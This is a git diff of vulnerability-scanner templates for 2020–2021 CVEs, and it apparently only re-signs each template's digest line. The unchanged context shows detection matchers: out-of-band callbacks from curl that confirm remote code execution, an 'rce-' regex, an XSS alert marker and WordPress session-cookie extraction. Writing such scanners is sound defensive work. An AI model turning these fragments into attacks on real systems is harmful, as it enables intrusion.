5de1a686901..6a80b786a87 100644 --- a/http/cves/2020/CVE-2020-8771.yaml +++ b/http/cves/2020/CVE-2020-8771.yaml @@ -68,4 +68,4 @@ http: regex: - "wordpress_[a-z0-9]+=([A-Za-z0-9%]+)" part: header -# digest: 4a0a0047304502203867ea9a50e146064dcc6e3b6288bb39df319430b4d0a298d31a7ee9160d586e022100b2a45c4058f512811966dec82840d8712887ae566d619ab0ac57776dba97c056:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aad590e1ee521bc1533ce319a4e601e4f010fbf7d536007e735f1457d6e5f099022100897e47296093cdebdee565637533650b0a9a1910df06bf943955f0f582bc2124:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8772.yaml b/http/cves/2020/CVE-2020-8772.yaml index e5802a20b5b..f3ed62e98e8 100644 --- a/http/cves/2020/CVE-2020-8772.yaml +++ b/http/cves/2020/CVE-2020-8772.yaml @@ -80,4 +80,4 @@ http: - 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/' internal: true part: header -# digest: 4a0a00473045022100bd90400e9551f129b4af66726b38b13f0c576f9b50a544dabc1feb5920601a5b022069ea2934e8a1a786583edfcfc13dbc6fb0e62619c443ba3bc3fe3ef66d2128b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207142a53d14efe30ffc23ae069d1eac1253989538eefab807e816f61bdb8f3c5c022100968538ec0ed942d3f927e46d67fc5b6acb9c31a40478e603c915b41dff4e60f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml index 582504852c1..68d4ee4b2c0 100644 --- a/http/cves/2020/CVE-2020-8813.yaml +++ b/http/cves/2020/CVE-2020-8813.yaml @@ -58,4 +58,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4a0a00473045022100c7e69eed57c948eec9db50cc826a90eba02a147de43a3fdcf3cdaa2d0975523f022041c5f5558f2bc6f13130a01d44adb4bc4983dfbd730d7255eba737812a0ce2e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100addc5eedbcf535a20e6b525394fa1e9c4a8d6711a5c283d86b85af34e212004802207c53b03e6a3955209ff14f2fff2fdb5ade272c8d5ac19a925c486200a06d7a7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9036.yaml b/http/cves/2020/CVE-2020-9036.yaml index fb4cb1718a4..03a9f65c177 100644 --- a/http/cves/2020/CVE-2020-9036.yaml +++ b/http/cves/2020/CVE-2020-9036.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cc0242a0b9575c94f2823164aaccc785ae8f5ac5d0b96d8ed0f905d21fe08e64022100e9634414d856ae26eb0156e54496dbf13f71b556b9bbc5fd0d8ea3b88bc625de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200e1213ab4abeb0b4e4ae0a5e34f2587cee63d1fcb71ba5caa7dcc53b324dc4d102202ff0e693574b6fd6c91f4266cdf40569a9f722006ac8572ecb772cd25b2c33e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9043.yaml b/http/cves/2020/CVE-2020-9043.yaml index b45b0cda07a..d9dafb43c95 100644 --- a/http/cves/2020/CVE-2020-9043.yaml +++ b/http/cves/2020/CVE-2020-9043.yaml @@ -77,4 +77,4 @@ http: - '_wpnonce=([0-9a-z]+)' internal: true part: body -# digest: 4b0a00483046022100f10cf6fbf7b1741c50a3ac41aa9630c1d9243396025b8259b4464d7e5cc483870221008f339d886e2a2c21230cc1015580bd61efefc0bdc7083c94c341be517896e546:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022031df9829b59f67cdc246d237a75ae6f2316f78c4e698ba03f1587a58a4ebe53302202e535af0c0a015fd453370958220c44fd258efef25c3aef823151ea6b736f190:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml index 7693370dfcb..7f62b90e137 100644 --- a/http/cves/2020/CVE-2020-9344.yaml +++ b/http/cves/2020/CVE-2020-9344.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100da870494d3d1874fe7ccba24e52be01325149d4efda8356898e49fb51983c6c802206d1d1e2fd75149fd36cf3d846d644ca2a87683366733bc5a0107f07358c13e03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022040739834b7ae9114cfcbe93c455d1226a69e1e1928edfbc915a7b4e60c073e470220320cd2d37c1470cbcf2bc43d108143abc8890e676b89a8867728c9fe64f41f75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9425.yaml b/http/cves/2020/CVE-2020-9425.yaml index 02c116cdbe1..36a326c95b5 100644 --- a/http/cves/2020/CVE-2020-9425.yaml +++ b/http/cves/2020/CVE-2020-9425.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210086c11819f36a426308bbc8370aabf0193e44a3ba8573c3c645dc404ce5e618e3022100e3767f5fb68aae1988294f5d5a8480fccaa6385e5d0185128e015b7519b819f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203e7877be2853a5573e5978b0ec6f05179dedacb03e9dae96da61ab78613c8f020221009298cf4c5ca5de4d8ba15cb21bff29bdeaaf4eac8e453d33610c43a76b25628f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9483.yaml b/http/cves/2020/CVE-2020-9483.yaml index fdf6db50e30..dc990d1ee11 100644 --- a/http/cves/2020/CVE-2020-9483.yaml +++ b/http/cves/2020/CVE-2020-9483.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220444a94c6866f0bb8353aa64d87d063a6e69412f5dc6219662d127d4d08ee990b02204b28ee91c6d674a1635d603b35dfd6b7fc5ef99cff72a25c75bd80799ac9dc14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a7343b489c1ed78cbc8a709d53431a6c5ff931d22b5dfa9f6a9f31566e322a29022100a24fe61678d319b8e27883081a46a24e6fa2bcf0094f8d83ad30cf5f3fd1d3d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9484.yaml b/http/cves/2020/CVE-2020-9484.yaml index d800b84fb55..3707067e256 100644 --- a/http/cves/2020/CVE-2020-9484.yaml +++ b/http/cves/2020/CVE-2020-9484.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100fb5eac371fc6a76124c9ca5c930ad973cccc001d9418e046608c30bf919c5724022100931964b7555afbb7dfd2e33bf8b1fdb68454b1f90233f4639bf3fdad90d4cb4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200aa572fc4f28218854eb671e07e82697fcf23bbca31689b1771833e1dacb0269022044dd0eb6c7b23bb0f69921cdeeead2d1a45f4956d23ff281fa05254c02695bbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9547.yaml b/http/cves/2020/CVE-2020-9547.yaml index b048352e3e4..fb4685f4771 100644 --- a/http/cves/2020/CVE-2020-9547.yaml +++ b/http/cves/2020/CVE-2020-9547.yaml @@ -60,4 +60,4 @@ http: - "com.fasterxml.jackson.databind" - "javax.naming.NamingException" condition: or -# digest: 4a0a00473045022100de3a8a1f2d09a30fcdf94e98d475340b4296ddf6ebef3b8742a63893bdf20fc202201e4131c3890dd7baf1199e7d8f9a3aafbb3ac550bd6a32dcf2d378d03ae4b2f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fc61f16d82b51d6c5128a4163bb816dbbfc366140b13defceef68413a870526e0220756406153edb421b5339b37dd46a5076093962f003b73c7007a50248aa7fab95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-1472.yaml b/http/cves/2021/CVE-2021-1472.yaml index 84a7a97ead4..6eb2a25f6cf 100644 --- a/http/cves/2021/CVE-2021-1472.yaml +++ b/http/cves/2021/CVE-2021-1472.yaml @@ -82,4 +82,4 @@ http: part: body words: - '"jsonrpc":' -# digest: 490a0046304402205d4711a6fa3ea6682a7ba7abc813c0c1eb1401a49bd607e890100bc924ee15cf022035e1aa350bc165c36d330b6c2accfe97f39ae9bfd2565e0d5d97324db0aec672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100837bbb361725aecff934d032b462d89039be3196ca9ac728b4a4abd4d0c55b40022100b27be5651dfe90c83afd7f6858928e0508d80dd3b7b0081e340ec22059caacf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-1497.yaml b/http/cves/2021/CVE-2021-1497.yaml index 89dadab359e..f5863449854 100644 --- a/http/cves/2021/CVE-2021-1497.yaml +++ b/http/cves/2021/CVE-2021-1497.yaml @@ -63,4 +63,4 @@ http: part: interactsh_request words: - "User-Agent: {{useragent}}" -# digest: 4a0a00473045022100a2162e9c3dfc15ebba14f6686eb1052a58b005ea03009ee82c981f6a48aee53b02206ea16d4986dda7a9cc052a4f6955ea4c5ecb5919cd98c6d34758cd00df3d869a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008f0ebbc60144bb5530c5a98efa6bd70a17917f93ed4d50bb30dfaabf51e8044e02201703ef614e815e375ae595e40322b26d206c06a6dfa0c7f08849f3dbe68e8911:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-1498.yaml b/http/cves/2021/CVE-2021-1498.yaml index f078289a2c2..2437fd7cff5 100644 --- a/http/cves/2021/CVE-2021-1498.yaml +++ b/http/cves/2021/CVE-2021-1498.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022014b7f3eca58f41dac24c71edc397cc94fafa77049d83ad2eeb1b447593fe6c72022100c8cd25c01be28fdfb88bfe487a5afedd671f42c1cde8987f2071c471f44586d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100debb953863c5add5bbdda74c1422c25e183a349b7576e427619a6f59ebe7dd4a022100fadf3ae8c7b62e0a06f3e5a58740acde1c17b97096c974ea8d2d7cca2f3d3f4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-1499.yaml b/http/cves/2021/CVE-2021-1499.yaml index b89987a9567..5e630594a5e 100644 --- a/http/cves/2021/CVE-2021-1499.yaml +++ b/http/cves/2021/CVE-2021-1499.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b5ff93c9a18f84631255ce43dd983bbf2c43b48822eee7aaf71d6cb6ab4b602e0221008312ccbb3ab45a8996298f9545afe674736eb88079b906389edd8c0461ecc11a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200b0355001937b0b718130995072aae39065a937cdc5a244e0a218301ae98a1d802203f5b91315f2c89bd724611764567c60119edca7f8d02a7c1609da89c8d48863d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20031.yaml b/http/cves/2021/CVE-2021-20031.yaml index 153332b3081..fb24c88172e 100644 --- a/http/cves/2021/CVE-2021-20031.yaml +++ b/http/cves/2021/CVE-2021-20031.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220778e2fda96e801bf0357731d44042fafa0581fadb6e0683946ca44790e457d64022100a62a8261eecab0c95523d0a6fa8af76b5b846f4fa725563b8b230256f93604e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009e9860a35b60a32699428cd467951a42beab88453cd0b709c9dc8f8324cf216e022100848b80040473e622cd4bbfd78f6d34114a49e62f03e332c19f35cef6a0a012f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20114.yaml b/http/cves/2021/CVE-2021-20114.yaml index 36855762674..9d0ad8109e8 100644 --- a/http/cves/2021/CVE-2021-20114.yaml +++ b/http/cves/2021/CVE-2021-20114.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204431d3d7477403a99b5dbfa8b4c1c9f64409ca56c75f5d6fdc97fc334eb7770202210091c29248205e230ed92f0aa05559b271fae0a7c4a7ddd7cd80b29495fbd74d96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b9bb2275d96165fa4aa4700db526e193780143fa7abf9c1627799e3137d5e070022100c9a44a3d181f3dad591deeb1ccc76dec75592dec9557d3bc91becfd511086ef1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20137.yaml b/http/cves/2021/CVE-2021-20137.yaml index fcb84d6ce5a..f5893101a62 100644 --- a/http/cves/2021/CVE-2021-20137.yaml +++ b/http/cves/2021/CVE-2021-20137.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c55cb693383a8d0c7da1b1951377de2b8b7a1a33c829156a7c657a964e6dcea602202cb4022438d54414faac1ece9b6f28330094d7b3dd94bbdab6a6b65342ce96ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220373a7d89ebfd008461eedbf843173b039f484725c09130f8685653fdbbf69adb022100cf71d3a1d5d7b91d173abf9bafe26c6d394e360b7961faa7c91acab2474eaf1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml index b8ecf75ca6c..183b5630d87 100644 --- a/http/cves/2021/CVE-2021-20150.yaml +++ b/http/cves/2021/CVE-2021-20150.yaml @@ -65,4 +65,4 @@ http: regex: - '' part: body -# digest: 4a0a0047304502203b5a092df3cc148e95ef3abbc8406b478904db50a61522591831d08c8f4432e1022100a7e7b6a422a13a9d5558e1f1ec1bc5803c677483aee71de80ba93feba7465ddc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206f3ebc331e4155d6860f592eae4ad4d4caf287d7943bd97b581f60db390bba86022100ffd15e938521e48a3fb813f955177ffddf697fdac00008b577e0c1296c4fee5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml index 22bf33b0052..962d625a1de 100644 --- a/http/cves/2021/CVE-2021-20158.yaml +++ b/http/cves/2021/CVE-2021-20158.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c44f56b37449a3b4bdd065c21f506bc4f6f65afdfda4ec90e9d3c874bd466027022100cce0b18a89b303f57668de0cfa09f16e47b2a912a2c49923073d0762f441e7f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a81a938cf973ee0daf8cad3b6e12739904c3d5d00a82284ce89b8e919233ef5f022007066f3c0fdb756ae812d9f02ac01d72adf8d07aa27084d089a8d9dc827109e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20167.yaml b/http/cves/2021/CVE-2021-20167.yaml index 40010ce7799..bcb4ac4ce14 100644 --- a/http/cves/2021/CVE-2021-20167.yaml +++ b/http/cves/2021/CVE-2021-20167.yaml @@ -48,4 +48,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 490a004630440220711be960ec85c7c122f3de85ccbb75cf79d89e78a8ac12fb94d4d6e2740b742e02207fef8fa7f6957a9f814fb0e50fa6f23e3d98d25d6b6c13ad7ed1c38271eafb8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022050493f2c14f41011d47bb91c5511a6644dd0a0ed22bcda252bdeefffd76931180220334d4dbf173b550f5c5dd23749c30c17bff8142e7d4225153897b95b5cb7c73b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml index 4a35685417e..df263222afe 100644 --- a/http/cves/2021/CVE-2021-20323.yaml +++ b/http/cves/2021/CVE-2021-20323.yaml @@ -71,4 +71,4 @@ http: - type: status status: - 400 -# digest: 4a0a004730450220558ff96beac42584712208285d0c29d27ba31f48aa14d25998ec34d59c93c5fc022100cfcc0bac053eed809593cbc09d1de39c4f315ec3ef7664e7a2a42ca50b1f7b87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205f05a26b294e2b23e66f2e79a0bb9ccb039429c40d821e328d7c7a14a6192673022100c21737941158ae9469e0933c6d31e1969c5b4c157c80c1ba9e7898997ad1b3e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20617.yaml b/http/cves/2021/CVE-2021-20617.yaml index 07f358ef8cc..65da4f91db8 100644 --- a/http/cves/2021/CVE-2021-20617.yaml +++ b/http/cves/2021/CVE-2021-20617.yaml @@ -53,4 +53,4 @@ http: - contains(body, "") - 'status_code == 302' condition: and -# digest: 4a0a004730450220552964421dc3f920242b909fba0b773efca4fafe68e60eead14f678843d6d926022100cd67c6893a0f450a27c3f447d6f05bae0259991dce95432e5353a35df26c8860:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201471af5dda4ee40983d08ff2a5da84ced7fd78e4f8d861c6da074e827a3ec0f7022100940d794c5172a8323cdf135eadf7a8f307b8505edf447f5ac8a6a802ece9ca33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20792.yaml b/http/cves/2021/CVE-2021-20792.yaml index 3dc78a7df0f..498f578d6e1 100644 --- a/http/cves/2021/CVE-2021-20792.yaml +++ b/http/cves/2021/CVE-2021-20792.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200d5623659af2bf63921cef414c8de4dca390ef8dbefcb678cab065a56df7b6fc022100ec745c6e1d15194a60d082e2bb883f15883cba6d5f22f2aa4d8843e055071a9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d316f24d0e3e07071a4111808ad2291f75c3ef45412fceedb12db6a195b62370022100854d57a31c1326df1bae5f06b6b71fc87b502636061bdf0bd0c0c81ff6de42eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml index f197a74a299..eb517df2e56 100644 --- a/http/cves/2021/CVE-2021-21087.yaml +++ b/http/cves/2021/CVE-2021-21087.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210090faece890b7bd36fdbc51776efcbe0e14a655102c4f5fb0e924e5154b676f6a022100cb45f78840200789131fd90febe164fcaec4687d2c6b86c19cc57e2a1823c8e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200d950d1ddbb384c79525ac3b0dee1c448ab5e6582255e58feef560c463f8b02d02207f514e1c343997e3a07603cecd73ceeda598272135ff97102aa4dbffd3ff6c90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21234.yaml b/http/cves/2021/CVE-2021-21234.yaml index dd401982939..6710fa8ddd5 100644 --- a/http/cves/2021/CVE-2021-21234.yaml +++ b/http/cves/2021/CVE-2021-21234.yaml @@ -58,4 +58,4 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and -# digest: 4a0a0047304502202716acb3ecacd07f3fdd5ee9e5b10ef8510e5b8f2373fbc95658780caebb8cde022100d204e853e8e0f10ad5684fe525269f03e1cf2820176e61bfafe9d5a32d9f90c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220479e2889e6e0da6baf565007512d53bb3cea6d46772c1915147070b644a9765502207fcfd00d782ac8df2a67f774bfac69c9a3060b2267bc3793fb0f8e54369688f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21287.yaml b/http/cves/2021/CVE-2021-21287.yaml index 96b114176aa..f54731402c4 100644 --- a/http/cves/2021/CVE-2021-21287.yaml +++ b/http/cves/2021/CVE-2021-21287.yaml @@ -61,4 +61,4 @@ http: - type: word words: - "We encountered an internal error" -# digest: 490a00463044022031dcc590c507cebbb15f02d210591c6d92b97739a2a9dbd0625cfcc235ea56be02207e7ebfadb8294bede290bb88734da20ded8e0cc5c3833f420ead2c0981586d79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c017cc5ad289d320936add5e0ccb3c5466443495315daf950bd68e495b2f48e902201079c735469ed72fedace100ddd3078633ce4ea230719d37050a75b5090ebd20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21345.yaml b/http/cves/2021/CVE-2021-21345.yaml index f527a9e4398..4fb8b5027a9 100644 --- a/http/cves/2021/CVE-2021-21345.yaml +++ b/http/cves/2021/CVE-2021-21345.yaml @@ -107,4 +107,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 490a004630440220626ac5ff51bed02fece360ac683690534e0b72c1961e2d30d3d277112a7d00c102200886c0ef898f2180c134c9387353ff56a2fafa828e7165cbf39418e60e8de5f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022069a9646186843354100c8786a6037b67942a8e0146919596334a45398e984b55022100f570e29bf66f3e7b445485e63475e4a14105f5eaade96832bb1c266537ab4275:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-2135.yaml b/http/cves/2021/CVE-2021-2135.yaml index fe674b723af..ab34b77dac6 100644 --- a/http/cves/2021/CVE-2021-2135.yaml +++ b/http/cves/2021/CVE-2021-2135.yaml @@ -113,4 +113,4 @@ javascript: part: interactsh_request regex: - 'rce-(linux|window)[^\s]*' -# digest: 4a0a0047304502204d33df730c24ee6850bc6c611b8f8a8c71d7eefd3365af24691c4a5961aa492802210098fb0616d63e23eb4bbe1b1438234d2a2b72f8577d5d0315df47fd52bee586e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100885b1edcd33d9fef71459f297273e911013ef35d8ff01e1a769791765c09960c02205d31790a3f9a5eba9d6596d136b32e6cc0347467d662a2ad7331dbc8ab911367:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21745.yaml b/http/cves/2021/CVE-2021-21745.yaml index fcef79ba9f7..4a77e0cc963 100644 --- a/http/cves/2021/CVE-2021-21745.yaml +++ b/http/cves/2021/CVE-2021-21745.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d750981b5a77178249e2d5b00e8554dad5932cfa0f42a69902fb16765757cc78022100e8cff8c6caf607e3a59a6ef4f351b7d9b2eeadb6bff80357f027e79c91f8f32b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c21dbfcd46eb18aee78c241488c1888aa90081a366a7ee858f6023b90433c6b9022100cceb9060ce8267298cd69120d3f90d00f6feaa4e8421d7d9464dc440f976d253:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21801.yaml b/http/cves/2021/CVE-2021-21801.yaml index 21d3be860d0..dbec06610a7 100644 --- a/http/cves/2021/CVE-2021-21801.yaml +++ b/http/cves/2021/CVE-2021-21801.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008141503ab3d1c49ec1e334516a2dad161fbc02f46b62a99a12d6683ca9bb466f022100ce82452bb4a155b61da68287556533084461635247650abe0d1d46c7e12ef246:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c9eafde4234660c94433f0cc76c44e96bfcecc938a04e662267f6101215f93670220220db07007b07718e561b2c9a4b10756a0f625192025e8e23b76e7aba9ae7fc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21802.yaml b/http/cves/2021/CVE-2021-21802.yaml index eda1e828c21..134b44fdeeb 100644 --- a/http/cves/2021/CVE-2021-21802.yaml +++ b/http/cves/2021/CVE-2021-21802.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220272d36b4b26df05dfe3e8c9431272d5e4a3bbe8c7aa622cf02d4377306103c69022100b3f84bcd395c747570d129afcea0d2e467fa6a6b19f85c47a343b87a36aeb212:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205f499338cd7ce00bee80fea642fb8b897f3de2be472e4d54a1f84251ba1128b40221009daf0b4055031aa59b0b3ceb0236f477ebb91c7355dd683e9d18edec7e6beb64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21816.yaml b/http/cves/2021/CVE-2021-21816.yaml index d5ae6f94396..e0655a3c3bc 100644 --- a/http/cves/2021/CVE-2021-21816.yaml +++ b/http/cves/2021/CVE-2021-21816.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206474ce0986f38bb683443f73bf5694c2a8aaa10efbe1c0d7ee93feabd8e0ee7f022100afc57d2af7c08b0d107cd4d8e93e3b382d498be3a96189acc6721d555cb81de2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b5179e728c72130a0c9c22c16215c3f284693c18507f1a6aff7cc883c0f14f9d022100cee4dfa0d9ab660926dc893d951e467a95aab70025bd518867f1f5c883ae24fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21972.yaml b/http/cves/2021/CVE-2021-21972.yaml index abd888eff2b..a7b91876b5c 100644 --- a/http/cves/2021/CVE-2021-21972.yaml +++ b/http/cves/2021/CVE-2021-21972.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220607d7cb3e861d2129fb8782b3a649d6a668f00a49ea72904eb36b21c6e7a3073022100bda76e41492d43171665e2fa9655e0ab7a63cdd438e87f3f11b306c0e05b85b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b0ec45f942cdc299c3d88e1aee2b7b927404e116481a86e4a94fc6e382bd88930220292b8f8d76dc5bf50187cfc062a391d6ebc65dd44c472fdeefe985c7eb1c0173:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21978.yaml b/http/cves/2021/CVE-2021-21978.yaml index 8abf2dced00..7176f6db078 100644 --- a/http/cves/2021/CVE-2021-21978.yaml +++ b/http/cves/2021/CVE-2021-21978.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207d86a133e420ef1892de169dbbe8f4950cfb9ef050dd1230073e4c1cda019c4d022100b65b5e9491690e90d8da47840724fc615695c987adfa049cecb0ce2d0f33de6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206d21328c78f8aac5942a7829ef1077389ebb5f843891968a6553150751d8415002201ef32c848f10446b32c5aa17da0a16bc679bd7e545f15461c596f2c7b4fec6ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21985.yaml b/http/cves/2021/CVE-2021-21985.yaml index 2f44b863239..af837b48b4b 100644 --- a/http/cves/2021/CVE-2021-21985.yaml +++ b/http/cves/2021/CVE-2021-21985.yaml @@ -45,4 +45,4 @@ http: part: body words: - '{"result":{"isDisconnected":' -# digest: 4a0a0047304502205548d5d1f3698e1215cb19940b337d09921ad0f07763ce20d8a3525c20c5f2a5022100d590356be4fc5755e4551694900fbf378646897d3f2818ce6ab5c500c4453ea9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b9c1ab6ebbd247b91814ee430ad1b33935e49e74b54777ae0833117199a7e99c022004be692dd04e0536c225c7a70471c132aea1603667263337ac71508df6f7ff4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml index 594cbdb7dbf..b2e06bc8315 100644 --- a/http/cves/2021/CVE-2021-22054.yaml +++ b/http/cves/2021/CVE-2021-22054.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220623e294b8ed4200b50b9d9d887f88d380442767f3becade954afce93f94211e20220562a4e3aca33160c7ba5400a1482bfeba93bf17dafe8f5ba9efc700a3fd2c3bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f41cfd576533bc16969274e97a6fc0b68b1933061239ab15df970b9e75bd9e2902207adae3e9b2a6a6b4c3a3f2e9a5a46f9d1231db039bb54927a165e54810ae3495:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml index 8d36cef123c..7045956e739 100644 --- a/http/cves/2021/CVE-2021-22122.yaml +++ b/http/cves/2021/CVE-2021-22122.yaml @@ -47,4 +47,4 @@ http: - "alert('document.domain')" - "No policy has been chosen." condition: and -# digest: 